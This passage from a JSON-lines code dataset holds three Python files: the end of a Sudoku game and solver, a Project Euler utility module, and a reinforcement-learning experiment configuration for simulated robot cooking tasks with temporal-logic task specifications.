4)\n    board = fill_box(board, 4, b4_pool)\n    # generate and place the fifth box\n    b5_pool = generate_box(board, 5)\n    board = fill_box(board, 5, b5_pool)\n    # generate and place the sixth box\n    b6_pool = generate_box(board, 6)\n    board = fill_box(board, 6, b6_pool)\n    # generate and place the 7th row\n    r7_pool = generate_row(board, 7)\n    board = fill_row(board, 7, r7_pool)\n    # generate and place the seventh box\n    b7_pool = generate_box(board, 7)\n    board = fill_box(board, 7, b7_pool)\n    # generate and place the eighth box\n    b8_pool = generate_box(board, 8)\n    board = fill_box(board, 8, b8_pool)\n    # generate and place the ninth box\n    b9_pool = generate_box(board, 9)\n    board = fill_box(board, 9, b9_pool)\n    # make sure generated board is solvable\n    if not board_checker(board):\n        board = generator()\n    return board\n\ndef make_puzzle(board):\n    '''Randomly removes a number until the board becomes \n    unsolvable if the randomly selected number were removed'''\n    prev_coords = (random.randint(0,8), random.randint(0,8))\n    prev_num = board[prev_coords[0]][prev_coords[1]]\n    board[prev_coords[0]][prev_coords[1]] = 0\n    while solvable(board):\n        prev_coords = (random.randint(0,8), random.randint(0,8))\n        prev_num = board[prev_coords[0]][prev_coords[1]]\n
        board[prev_coords[0]][prev_coords[1]] = 0\n    board[prev_coords[0]][prev_coords[1]] = prev_num\n    return board\n\ndef solvable(board):\n    '''Returns True or False for whether or not the board is solvable'''\n    board_copy = copy.deepcopy(board)\n    if solver(board_copy) == False:\n        return False\n    else:\n        return True\n\ndef solver(board):\n    '''\n    return the solved given board \n    '''\n    # get all coordinates of not filled in numbers\n    # try to place 1-9 in those coords\n    # via row, col, and box checker\n    # while not board_checker\n\n    # create an array and populate it with coordinates of spots without numbers\n    unplaced_nums = {}\n    for i_r, row in enumerate(board):\n        for i_c, col in enumerate(row):\n            if col == 0:\n                unplaced_nums[(i_r, i_c)] = set()\n\n    runs = 0\n    while not board_checker(board):\n        # prolly wont happen but conditional to catch unsolved board without any empty spaces\n        if len(unplaced_nums) == 0: \n            print('something is messed up')\n            break\n        to_remove = []\n        for coords in unplaced_nums.keys():\n            possible_nums = set()\n            # find what numbers might work in each square\n            for num in range(1, 10):\n                if not row_checker(board, num, coords[0]):\n                    if not col_checker(board, num, coords[1]):\n                        if not box_checker(board, num, (coords)):\n                            if num not in possible_nums:\n                                possible_nums.add(num)\n                                unplaced_nums[coords].add(num)\n            # if there is only one possible number set that in the board\n            # and set that coordinate pair to be removed from the list\n            if len(possible_nums) == 1:\n                # set the spot on the board as the only value in the set of nums\n                board[coords[0]][coords[1]] = next(iter(possible_nums))\n                to_remove.append(coords)\n                runs = 0\n        runs += 1\n        if runs == 5:\n            return False\n        # remove all newly placed coordinates\n        for coord in to_remove:\n            unplaced_nums.pop(coord)\n    return board\n\ndef replace(board, num, row, col):\n    '''Place the number (num) in the specified row (row)\n    and column (col) within the board (board)'''\n    board[row-1][col-1] = num\n\ndef printer(board):\n    '''Print the board to the terminal formatted in a TBD way'''\n    # clear the screen before printing the board\n    os.system('clear')\n    # length of row divider lines\n    width = 45\n    print('\\n ', end='')\n    #print column numbers\n    for i in range(1, 10):\n        print(' ' + str(i) + ' ', end='')\n        if i%3==0:\n            print(' ', end='')\n    # print top line of board\n    print('\\n\\n ' + '-'*width)\n    for i, r in enumerate(board):\n        # convert list of ints into string with spaces every 3 numbers\n        stringed = ''\n        for ind, num in enumerate(r):\n            stringed += str(num) \n            if ind%3==2:\n                stringed += ' '\n        # print row number and row of numbers with dividers\n        print(str(i+1) + ' | '+' | '.join(stringed))\n        # print row separator\n        print(' ' +'-'*width)\n        # print box separator \n        if i%3==2 and i!=8:\n            print(' '+'-'*width)\n\ndef main_game_loop_func_cli(board):\n    solve = ''\n    # board is not solved... keep playing\n    while not board_checker(board):\n        printer(board)\n        if solve == '':\n            solve = input('Do you want to see this one solved? (Y/n)')\n        if solve == 'Y':\n            board = solver(board)\n        else:\n            num = input_validator('What is the number you wish to place on the board? ')\n            row = input_validator('What row is that number to go in? ')\n            col = input_validator('What column is that number to go in? ')\n            replace(board, num, row, col)\n    if board_checker(board):\n        # board is solved!\n        printer(board)\n        print('\\nYou have successfully completed this Sudoku puzzle!!')\n
        new_game = input('Do you want to play again? (Y/n)')\n        if new_game == 'Y':\n            solve = ''\n            board = make_puzzle(generator())\n\ndef main_game_loop_func_pygame(board):\n    # pygame keycode and corresponding number\n    NUM_KEYS = {48:0, 49:1, 50:2, 51:3, 52:4, 53:5, 54:6, 55:7, 56:8, 57:9}\n    # size of sudoku boxes\n    r_size = 50\n    # initialize pygame and all necessary modules\n    pg.init()\n    # window size\n    screen = pg.display.set_mode((11*r_size, 13*r_size))\n    # window title\n    pg.display.set_caption('SuDoKu')\n    # generate white background surface\n    background = pg.Surface(screen.get_size())\n    background = background.convert()\n    background.fill((250, 250, 250))\n    # Draw title inside of window\n    if pg.font:\n        font = pg.font.Font(None, 36)\n        text = font.render(\"SuDoKu!\", 1, (10, 10, 10))\n        textpos = text.get_rect(centerx=background.get_width()/2)\n        background.blit(text, textpos)\n\n    # initialize clock\n    clock = pg.time.Clock()\n    \n    # all of the squares for the sudoku grid\n    border_rects = []\n    for y in range(1, 10):\n        for x in range(1, 10):\n            border_rects.append(pg.rect.Rect((x+x*r_size, y+y*r_size),(r_size, r_size)))\n    # drawing the squares\n    for rect in border_rects:\n        pg.draw.rect(background, [0,0,0], rect, 3)\n        background.fill([250,250,250], rect=rect)\n    \n    # generate solver button and text\n    solver_button = pg.rect.Rect((background.get_width()//3)-r_size, 11*r_size, r_size*2, r_size)\n    pg.draw.rect(background, [0,0,0], solver_button, 3)\n    if pg.font:\n        font = pg.font.Font(None, 36)\n        text = font.render(\"Solve!\", 1, (10, 10, 10))\n        textpos = text.get_rect(centerx=background.get_width()//3, centery=11.5*r_size)\n        background.blit(text, textpos)\n\n    # generate new game button and text\n    ng_button = pg.rect.Rect((2*(background.get_width()//3)-1.5*r_size), 11*r_size, r_size*3, r_size)\n    pg.draw.rect(background, [0,0,0], ng_button, 3)\n    if pg.font:\n        font = pg.font.Font(None, 36)\n        text = font.render(\"New Game\", 1, (10, 10, 10))\n        textpos = text.get_rect(centerx=2*(background.get_width()//3), centery=11.5*r_size)\n        background.blit(text, textpos)\n    \n    # generate box borders\n    box_borders = []\n    # outer border\n    box_borders.append(pg.rect.Rect(r_size, r_size, 9+r_size*9, 9+r_size*9))\n    # vertical border box\n    box_borders.append(pg.rect.Rect(2+4*r_size, r_size, 4+3*r_size, 9+9*r_size))\n    # horizontal border box\n    box_borders.append(pg.rect.Rect(r_size, 2+4*r_size, 9+9*r_size, 4+3*r_size))\n    \n    # store previously clicked rect initialized as false\n    prev_clicked = 0\n    while 1:\n        # 60 fps max\n        clock.tick(60)\n        # draw border boxes\n        for box in box_borders:\n            pg.draw.rect(background, [0,0,0], box, 6)\n\n        for event in pg.event.get():\n            # Exit events\n            if event.type == QUIT:\n                return\n            elif event.type == KEYDOWN and event.key == K_ESCAPE:\n                return\n            \n            # mouse-click handling\n            if event.type == pg.MOUSEBUTTONUP:\n                # revert the previously clicked square's state\n                if prev_clicked:\n                    pg.draw.rect(background, [250,250,250], prev_clicked)\n                    pg.draw.rect(background, [0,0,0], prev_clicked, 1)\n                # get mouse position\n                pos = pg.mouse.get_pos()\n                # find square mouse click is in\n                clicked_sqr = [s for s in border_rects if s.collidepoint(pos)]\n                # ensure that a square was actually clicked and not something off the board\n                if clicked_sqr != []:\n                    # save clicked square so that the state status can be reset\n                    prev_clicked = clicked_sqr[0]\n                    # set state of clicked square\n                    pg.draw.rect(background, [200,200,200], clicked_sqr[0])\n                \n                # solve button logic\n                if solver_button.collidepoint(pos):\n                    for rect in border_rects:\n                        background.fill([250,250,250], rect=rect)\n                    
solver(board)\n printer(board)\n \n if ng_button.collidepoint(pos):\n for rect in border_rects:\n background.fill([250,250,250], rect=rect)\n board = make_puzzle(generator())\n \n # getting the number pressed to change the clicked sqr to\n if event.type == KEYDOWN and event.key in NUM_KEYS.keys():\n # get the number that corresponds to the pygame keycode\n num = NUM_KEYS[event.key]\n # get the box that was clicked\n abs_pos = border_rects.index(prev_clicked)\n # get the row/col within the board\n row = abs_pos//9\n col = abs_pos%9\n # update number in board\n board[row][col] = num\n background.fill([250,250,250], rect=prev_clicked)\n\n # Flatten the board array for easier number placement\n # bc the square list is only 1D\n board_nums = []\n for row in board:\n board_nums.extend(row)\n # Draw in the numbers\n if pg.font:\n font = pg.font.Font(None, 36)\n for ind, sqr in enumerate(border_rects):\n # background.fill([250,250,250], rect=sqr)\n text = font.render(str(board_nums[ind]), 1, (10, 10, 10))\n # position number in the center of all the squares\n textpos = text.get_rect(centerx=sqr.x+(sqr.width/2), centery=sqr.y+(sqr.height/2))\n background.blit(text, textpos)\n # redraws updated screen\n screen.blit(background, (0, 0))\n pg.display.flip()\n \n # change screen to win state!\n if board_checker(board):\n pg.display.update()\n if pg.font:\n # win statement text\n win_text = font.render(\"YOU WIN!!\", 1, (0,0,0))\n win_textpos = win_text.get_rect(centerx=background.get_width()/2, \n centery=10.5*r_size)\n background.blit(win_text, win_textpos)\n # friendly quitting\n pg.quit()\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n preparse_board = sys.argv[1:][0]\n board = parse_board(preparse_board)\n\n board = generator()\n board = make_puzzle(board) \n # printer(board)\n main_game_loop_func_cli(board) \n # main_game_loop_func_pygame(board)\n","repo_name":"Perzival1312/sudoku","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42121221739","text":"#---------------------------------------------------------------------------------------------------------\n#\tPassed an integer, returns a list with digits in that integer\n#---------------------------------------------------------------------------------------------------------\nimport time\nimport csv\nimport sys\nimport winsound\n\ndef is_pandigital(ls):\n if len(ls) != 9:\n return False\n if '1' in ls and '2' in ls and '3' in ls and '4' in ls and '5' in ls and '6' in ls and '7' in ls and '8' in ls and '9' in ls:\n return True\n return False\n\ndef fibonacci(counter, n_minus1 = 0, n_minus2 = 0):\n\tif n_minus1 > 0 and n_minus2 > 0:\n\t\treturn n_minus1 + n_minus2\n\n\telse:\n\t\tn_1 = 1\n\t\tn_2 = 1\n\t\tnum_iter = 2\n\t\tx = 0\n \n\t\twhile(num_iter < counter):\n\t\t\tx = n_1 + n_2\n\t\t\tn_1 = n_2\n\t\t\tn_2 = x\n\t\t\tnum_iter += 1\n\t\treturn x\n\ndef decompose_digit(num):\n\tls = []\n\tremain = num\n\ttemp = num\n\tmagnitude = 10\n\twhile( remain > 0 ):\n\t\ttemp = remain % magnitude\n\t\tls.append( round(temp / (magnitude/10) ) )\t\t# We round to the nearest int to prevent floats near the exact\n\t\tremain -= temp\n\t\tmagnitude *= 10 \t\t\t\t\t# Increases by an order of magnitude\n\t\t\n\treturn ls[::-1] # Reverses the list\n\t\ndef str_to_int(str):\n\tnum = 0\n\tfor i in range(0, len(str)):\n\t\tif i != (len(str) -1):\n\t\t\tnum += (ord(str[i]) - 48)*(10**(len(str) - i 
-1))\n\t\telse:\n\t\t\tnum += ((ord(str[i]) - 48))\n\treturn num\n\ndef import_csv(file):\n\tls = []\n\twith open(file, 'rt') as f:\n\t\treader = csv.reader(f)\n\t\tfor row in reader:\n\t\t\tls.append(row)\n\treturn ls\t\t\t\t\t\t\t# Change to ls[0] if you only want the first row.\n\ndef write_csv(file, ls):\n\n\tif sys.version_info >= (3,0,0):\n\t\tf = open(file, 'w', newline='')\n\telse:\n\t\tf = open(file, 'wb')\n\twriter = csv.writer(f, delimiter=',',quoting=csv.QUOTE_ALL)\n\twriter.writerow(ls)\n\t\ndef int_to_str(integer, magnitude=10):\n\tnum = ''\n\tcurrent = 0\n\tlast = -1\n\tcurrent_mag = magnitude\n\t\n\twhile (integer % current_mag) != integer:\n\t\tlast = current\n\t\tcurrent = (integer % current_mag) - last\n\t\tcurrent = int(current / (current_mag/magnitude))\n\t\tnum += ( chr( current + 48 ))\n\t\tcurrent_mag *= int(magnitude)\n\tlast = current\n\tcurrent = (integer % current_mag) - last\n\tcurrent = int(current / (current_mag/magnitude))\n\tnum += ( chr( current + 48 ))\n\tnum = num[::-1] # Reverses the string\n\n\treturn num\n#=====================================================================================================\n# Outputs total runtime from 'start' variable\n#=====================================================================================================\n\ndef runtime(start):\n\truntime=time.perf_counter()-start\t# time.clock() was removed in Python 3.8\n\tprint(\"The total program runtime was \",runtime,\" seconds.\")\n\twinsound.Beep(300,2000)\n\t\n#=====================================================================================================\n# Builds a list of ASCII characters when passed a string\n#=====================================================================================================\ndef decompose_string(string):\n\tls=[]\n\tfor i in range(0, len(string)):\n\t\tls.append(string[i])\n\treturn ls\n#====================================================================================================\n# Sieve of Eratosthenes algorithm to return prime numbers up to numerical limit\n#==================================================================================================== \ndef primes_sieve(limit):\n\tprimes_ls = []\n\ta = []\n\tfor i in range(limit + 1): # Initialize the primality list\n\t\ta.append(True)\n\ta[0] = a[1] = False\n\n\tmultiplier = 2\n\tfactor = 0\n\tfor i in range(len(a)):\n\t\tif a[i] == True:\n\t\t\tfactor = i*multiplier\n\t\t\twhile factor <= limit:\n\t\t\t\tif factor <= limit:\n\t\t\t\t\ta[factor] = False\n\t\t\t\tmultiplier += 1\t\t\t\t\t# Increments multiplier for next pass\n\t\t\t\tfactor = i*multiplier\n\t\t\tmultiplier = 2\n\t\n\tfor i in range(len(a)):\n\t\tif a[i] == True:\n\t\t\tprimes_ls.append(i)\n\treturn primes_ls\n\t\n#====================================================================================================\n# Rotate string by specified number of chars. 
Default =1\n#====================================================================================================\ndef rotate(str, rot_num_chars =1):\n\tif rot_num_chars > len(str):\n\t\treturn 'Error!'\n\t\n\ttemp1 = str[0:rot_num_chars]\n\ttemp2 = str[rot_num_chars:]\n\t\n\treturn temp2 + temp1","repo_name":"jbradfield2-718/Python_Project_Euler","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28252813578","text":"import numpy as np\nfrom future.utils import viewitems\nimport os\nimport copy\nfrom rl_pipeline.configuration.configuration import Configuration\n\nimport json\n\nenv_cal = {}\ndefault_config = {\n 'env_name': \"vrep\",\n 'robot': 'jaco',\n 'headless': False,\n # translation_gen can be 'clf', 'cbf', 'clf_cbf', 'dmp', orientation_gen can be 'dmp'\n 'components': {'mdp': True, 'fsa': False, 'translation_gen': 'clf_cbf', 'orientation_gen': 'dmp'},\n 'task': 'switchon',\n 'fsa_save_dir': os.getcwd(),\n 'fsa_name': 'g',\n 'particle_test': False\n}\n\nclass ExperimentConfig(object):\n\n def __init__(self, config={}):\n self.ExperimentConfig_config = Configuration(default_config)\n self.ExperimentConfig_config.update(config)\n\n self.env_name = self.ExperimentConfig_config.get('env_name')\n self.headless = self.ExperimentConfig_config.get('headless')\n self.components = self.ExperimentConfig_config.get('components')\n self.robot = self.ExperimentConfig_config.get('robot')\n\n # used in batch_sampler to post-process rewards\n self.process_rewards = None\n self.Environment = None\n\n self.Environment = self.construct_env()\n\n def construct_env(self):\n #### traj generator ####\n translation_gen = self.components['translation_gen']\n orientation_gen = self.components['orientation_gen'] \n \n traj_gen_type, traj_gen_config = self.construct_traj_generator(translation_gen=translation_gen, orientation_gen=orientation_gen)\n\n #### MDP ####\n if self.components['mdp'] and not self.components['fsa']:\n if self.ExperimentConfig_config.get('task') == 'switchon' and self.robot == 'jaco':\n get_state, get_reward, is_done, state_space, action_space, other = self.switch_task_mdp_config(on_or_off='on')\n else:\n raise ValueError('task and robot not match')\n\n construct_mdp_env_config = {\n 'get_state': get_state,\n 'get_reward': get_reward,\n 'is_done': is_done,\n 'state_space': state_space,\n 'action_space': action_space,\n 'other': other\n }\n mdp_env_type, mdp_env_config = self.construct_mdp_env(mdp_config=construct_mdp_env_config,\n traj_gen_type=traj_gen_type,\n traj_gen_config=traj_gen_config)\n Environment = {\n 'type': mdp_env_type,\n 'config': mdp_env_config\n }\n\n return Environment\n\n #### FSA ####\n elif self.components['mdp'] and self.components['fsa']:\n if self.ExperimentConfig_config.get('task') == 'makehotdog' and self.robot == 'jaco':\n task_spec, construct_state, predicate_robustness, obs_dim = self.get_tl_related(task=self.ExperimentConfig_config.get('task'))\n get_state, get_reward, is_done, state_space, action_space, other = self.makehotdog_task_mdp_config(get_state_fn=construct_state, obs_dim=obs_dim)\n \n elif self.ExperimentConfig_config.get('task') == 'serve' and self.robot == 'baxter':\n task_spec, construct_state, predicate_robustness, obs_dim = self.get_tl_related(task=self.ExperimentConfig_config.get('task'))\n get_state, get_reward, is_done, state_space, action_space, other = 
self.serve_task_mdp_config(get_state_fn=construct_state, obs_dim=obs_dim)\n \n else:\n raise ValueError('task and robot not match')\n\n\n construct_mdp_env_config = {\n 'get_state': get_state,\n 'get_reward': get_reward,\n 'is_done': is_done,\n 'state_space': state_space,\n 'action_space': action_space,\n 'other': other\n }\n mdp_env_type, mdp_env_config = self.construct_mdp_env(mdp_config=construct_mdp_env_config,\n traj_gen_type=traj_gen_type,\n traj_gen_config=traj_gen_config)\n\n from learning.env.fsa_augmented_env import FsaAugmentedEnv\n\n fsa_augmented_env_config = {\n 'fsa_save_dir': self.ExperimentConfig_config.get('fsa_save_dir'),\n 'dot_file_name': self.ExperimentConfig_config.get('fsa_name'),\n 'svg_file_name': self.ExperimentConfig_config.get('fsa_name'),\n 'robot': self.robot,\n 'base_env': {\n 'type': mdp_env_type,\n 'config': mdp_env_config,\n },\n 'spec': {\n 'predicate_form': task_spec,\n 'predicate_robustness': predicate_robustness\n }\n }\n \n Environment = {\n 'type': FsaAugmentedEnv,\n 'config': fsa_augmented_env_config\n }\n\n return Environment\n else:\n raise ValueError('can not have fsa without mdp')\n return None\n \n \n def construct_mdp_env(self, mdp_config={}, traj_gen_type=None, traj_gen_config=None):\n self.reset = {\n 'type': None,\n 'config': {}\n }\n \n if self.env_name == 'vrep': \n from learning.env.learning_env import LearningEnv\n from cooking_env.env.base.ce import CookingEnv\n\n self.reset = mdp_config['other']['reset']\n \n self.mdp_env_type = LearningEnv\n self.mdp_env_config = {\n # Common to all envs\n \"seed\": 10,\n \"state_space\": mdp_config['state_space'],\n \"action_space\": mdp_config['action_space'],\n \"get_state\": mdp_config['get_state'],\n \"get_reward\": mdp_config['get_reward'],\n \"is_done\": mdp_config['is_done'],\n \"get_info\": None,\n #### class specific ####\n \"WPGenerator\": {\n 'type': traj_gen_type,\n 'config': traj_gen_config\n },\n # for cooking environment\n \"BaseEnv\":{\n 'type': CookingEnv,\n 'config': {\n # specific to this env\n \"suffix\": \"\",\n \"particle_test\": self.ExperimentConfig_config.get('particle_test'),\n \"arm\": self.robot,\n \"control_mode\": \"velocity\"\n }\n }\n }\n\n else:\n raise ValueError('unsupported environment')\n\n return self.mdp_env_type, self.mdp_env_config\n\n def construct_traj_generator(self, translation_gen=\"clf_cbf\", orientation_gen='dmp'):\n from traj_generators.trajectory_generator import TrajectoryGenerator\n\n config = {\n 'dmp_config': {\n # gain on attractor term y dynamics (linear)\n 'ay': 55,\n # gain on attractor term y dynamics (linear)\n 'by': None,\n # gain on attractor term y dynamics (angular)\n 'az': 55,\n # gain on attractor term y dynamics (angular)\n 'bz': None,\n # timestep\n 'dt': 0.005,\n # time scaling, increase tau to make the system execute faster\n 'tau': 1.,\n 'use_canonical': False,\n # for canonical\n 'apx': 1.,\n 'gamma': 0.3,\n # for faster convergence\n 'app': 0.5,\n 'apr': 0.5,\n # for integrating goal\n 'ag': 3.0,\n 'ago': 3.0,\n # if True, then update according to dmp_pose, else update according to current pose\n 'use_dmp_pose': True,\n 'n_linear_dmp': 3,\n 'n_angular_dmp': 3\n },\n 'clf_cbf_config': {\n 'k_cbf': 1.1,\n 'epsilon':0.8,\n 'num_states':3,\n 'action_space': {'shape': (3,), 'upper_bound': 0.2 * np.ones(3), 'lower_bound': -0.2 * np.ones(3)},\n 'use_own_pose': True,\n 'dt': 0.05,\n 'log_dir': os.path.join(os.environ['LEARNING_PATH'], 'execution', 'log')\n },\n 'translation_gen': translation_gen,\n 'orientation_gen': orientation_gen\n 
}\n\n return TrajectoryGenerator, config\n\n\n def serve_task_mdp_config(self, get_state_fn=None, obs_dim=None): \n #### State ####\n def get_state(all_info):\n if not get_state_fn:\n raise ValueError('need to provide get_state_fn')\n else:\n mdp_state = get_state_fn(all_info)\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n return 0\n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n return False\n \n state_space = {'type': 'float', 'shape': (obs_dim, ), 'upper_bound': [], 'lower_bound': []}\n\n action_coeff = 120\n action_space = {'type': 'float', 'shape': (3, ), \"upper_bound\": np.ones(3) * action_coeff, \"lower_bound\": -np.ones(3) * action_coeff}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n \n \n def makehotdog_task_mdp_config(self, get_state_fn=None, obs_dim=None): \n #### State ####\n def get_state(all_info):\n if not get_state_fn:\n raise ValueError('need to provide get_state_fn')\n else:\n mdp_state = get_state_fn(all_info)\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n return 0\n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n return False\n \n state_space = {'type': 'float', 'shape': (obs_dim, ), 'upper_bound': [], 'lower_bound': []}\n\n translation_coeff = 0.2\n rotation_coeff = 200\n vel_upper = np.concatenate([translation_coeff * np.ones(3), rotation_coeff*np.ones(3)])\n vel_lower = -np.concatenate([translation_coeff * np.ones(3), rotation_coeff*np.ones(3)])\n upper_bound = np.hstack([1, vel_upper])\n lower_bound = np.hstack([0, vel_lower])\n action_space = {'type': 'float', 'shape': (7, ), \"upper_bound\": upper_bound, \"lower_bound\": lower_bound}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n \n def switch_task_mdp_config(self, on_or_off='on'):\n\n #### State ####\n def get_state(all_info):\n # mdp_state = np.array(list(all_info['target_pos']) + \\\n # list(all_info['target_quat']))\n mdp_state = np.array(all_info['curr_pose'])[:3]\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n button_vel = all_info['button_vel']\n button_joint_frame_angle = all_info['button_angle']\n\n r = -10*(button_joint_frame_angle - 1.15)\n\n if button_joint_frame_angle < 0.6:\n r += 5.\n\n motion_range = all_info['motion_range']\n low = np.array([motion_range['x'][0], motion_range['y'][0], motion_range['z'][0]])\n high = np.array([motion_range['x'][1], motion_range['y'][1], motion_range['z'][1]])\n target_pos = state[:3]\n\n ## done if move outside of motion region\n if any(target_pos < low) or any(target_pos > high):\n r -= 1.5\n\n button_disturbance = np.linalg.norm(np.concatenate([button_vel[:3], button_vel[-2:]]))\n if button_disturbance > 0.1:\n r = -2.\n \n return r\n \n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n done = False\n motion_range = all_info['motion_range']\n low = np.array([motion_range['x'][0], motion_range['y'][0], 
motion_range['z'][0]])\n high = np.array([motion_range['x'][1], motion_range['y'][1], motion_range['z'][1]])\n target_pos = state[:3]\n\n ## done if move outside of motion region\n if any(target_pos < low) or any(target_pos > high):\n print(\"done: moved outside of motion region\")\n done = True\n\n ## done if reached goal\n goal_dist = np.linalg.norm(target_pos - all_info['goal'][:3])\n if goal_dist < 0.01:\n print(\"done: reached goal\")\n done = True\n\n ## done if hit button \n button_vel = all_info['button_vel']\n button_disturbance = np.linalg.norm(np.concatenate([button_vel[:3], button_vel[-2:]]))\n if button_disturbance > 0.1:\n print('done: button pushed away from nominal')\n done = True\n\n ## done if finished task\n toaster_joint_frame_angle = all_info['button_angle']\n # print(all_info['button_joint_frame_angle'][2])\n if toaster_joint_frame_angle < 0.57:\n print('done: turn on task done')\n done = True\n \n return done\n \n state_space = {'type': 'float', 'shape': (3, ), 'upper_bound': [], 'lower_bound': []}\n\n action_coeff = 120\n action_space = {'type': 'float', 'shape': (3, ), \"upper_bound\": np.ones(3) * action_coeff, \"lower_bound\": -np.ones(3) * action_coeff}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n def get_tl_related(self, task='makehotdog'):\n from tl_utils.tl_config import TLConfig\n\n tlconfig = TLConfig({'robot': self.robot, 'mode': 'sim'})\n\n if task == 'makehotdog' and self.robot == 'jaco':\n task_spec_wo_condiment = \"moveto_world_jaconeutral && X F\" + \\\n \"((closegripper) && X F (\" + \\\n \"(moveto_hotdogplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_grill && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"(moveto_world_jaconeutral && X F \" + \\\n \"((moveto_grill && opengripper) && X F \" + \\\n \"(closegripper && X F \"+\\\n \"((moveto_bunplate && closegripper) && X F \"+\\\n \"(opengripper && X F \" + \\\n \"(moveto_world_jaconeutral\" + \\\n \")))))))))))\"\n\n apply_condiment_ = \"(moveto_condiment_condimentpre && opengripper) && X F \" + \\\n \"(moveto_condiment_condimentpost && X F \" + \\\n \"(closegripper && X F \"+ \\\n \"((moveto_bunplate_relativeplateapplycondimentpost && closegripper) && X F \"+\\\n \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n \"(opengripper && X F\" + \\\n \"(moveto_condiment_condimentpre\" + \\\n \"))))))\"\n\n\n # entire_task_w_condiment = \"moveto_world_jaconeutral && X F\" + \\\n # \"((flipswitchon && closegripper) && X F \" + \\\n # \"((moveto_hotdogplate && opengripper) && X F \" + \\\n # \"(closegripper && X F \" + \\\n # \"((moveto_grill && closegripper) && X F \" + \\\n # \"(opengripper && X F \"+ \\\n # \"(moveto_world_jaconeutral && X F \" + \\\n # \"((moveto_grill && opengripper) && X F \" + \\\n # \"(closegripper && X F \"+\\\n # \"((moveto_bunplate && closegripper) && X F \"+\\\n # \"(opengripper && X F \" + \\\n # \"((moveto_condiment_condimentpre && opengripper) && X F \" + \\\n # \"(moveto_condiment_condimentpost && X F \" + \\\n # \"(closegripper && X F \"+ \\\n # \"((moveto_bunplate_relativeplateapplycondimentpost && closegripper) && X F \"+\\\n # \"(applycondiment && X F\" + \\\n # \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n # \"(opengripper && X F\" + \\\n # \"(moveto_world_jaconeutral && 
X F\" + \\\n # \"(closegripper && X F\" + \\\n # \"(flipswitchoff && X F\" + \\\n # \"(moveto_world_jaconeutral\" +\\\n # \")))))))))))))))))))))\"\n\n\n entire_task_w_condiment = \"moveto_world_jaconeutral && X F\" + \\\n \"((flipswitchon && closegripper) && X F \" + \\\n \"((moveto_hotdogplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_grill && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"((moveto_world_jaconeutral && opengripper) && X F \" + \\\n \"((moveto_grill && opengripper) && X F \" + \\\n \"(closegripper && X F \"+\\\n \"((moveto_bunplate && closegripper) && X F \"+\\\n \"(opengripper && X F \" + \\\n \"((moveto_condiment_condimentpre && opengripper) && X F \" + \\\n \"(moveto_condiment_condimentpost && X F \" + \\\n \"(closegripper && X F \"+ \\\n \"((moveto_world_applycondimentpre && closegripper) && X F \"+\\\n \"((moveto_world_applycondimentpost && closegripper) && X F \"+\\\n \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n \"(opengripper && X F\" + \\\n \"(moveto_world_jaconeutral && X F\" + \\\n \"(flipswitchoff && X F \" + \\\n \"(moveto_world_jaconeutral\" + \\\n \"))))))))))))))))))))\"\n \n\n \n task_spec = \"F(\" + entire_task_w_condiment + \")\"\n # task_spec = \"F(closegripper && X F (moveto_grill))\"\n \n elif task == 'serve' and self.robot == 'baxter':\n # serve = \"(moveto_bunplate && opengripper) && X F \" + \\\n # \"(closegripper && X F \" + \\\n # \"((moveto_serveplate && closegripper) && X F \" + \\\n # \"(opengripper && X F \"+ \\\n # \"(moveto_world_baxterneutral \" + \\\n # \"))))\"\n\n serve = \"(moveto_bunplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_serveplate && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"(moveto_world_baxterneutral \" + \\\n \"))))\"\n\n\n #### serve task KG ####\n serve_task_KB = \"G (!(moveto_serveplate && moveto_bunplate)) && \" + \\\n \"G (!(opengripper && closegripper)) && \" + \\\n \"G (!(moveto_serveplate && moveto_world_baxterneutral)) && \" + \\\n \"G (!(moveto_bunplate && moveto_world_baxterneutral)) && \" + \\\n \"G (!(moveto_serveplate && moveto_bunplate && moveto_world_baxterneutral))\"\n \n\n #### FSA version\n # serve_task_ = \"(( inservezone_serveplate -> X F (\" + serve + \")) && (!inservezone_serveplate -> X F moveto_world_baxterneutral))\" + \" && \" + serve_task_KB\n\n # task_spec = \"F(\" + serve + \" )&& (! (\" + serve + \") U inservezone_serveplate)\" + \" && \" + serve_task_KB\n\n task_spec = \"F(\" + serve + \" ) && (! 
